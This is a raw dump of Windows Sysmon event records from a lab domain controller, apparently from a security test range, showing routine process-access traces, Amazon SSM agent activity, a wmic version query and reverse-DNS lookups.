13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.774{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E5B-6005-5500-00000000A301}37483696C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.763{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.681{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.681{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5B00-00000000A301}3936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.673{59A5CD1D-8E56-6005-2D00-00000000A301}22203296C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5d95e 154100x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.239{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe-----"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=9827A4A56980129F90A7A8FCA6065B29,SHA256=3AF8AEFAFDACA2124F5FA4B747753A17F62C7B442BB9F7917C832AB4AA7A0237,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 22542200x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.675{59A5CD1D-8E56-6005-2E00-00000000A301}24641.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 22542200x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.606{59A5CD1D-8E56-6005-2E00-00000000A301}246414.1.0.10.in-addr.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.580{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5A00-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 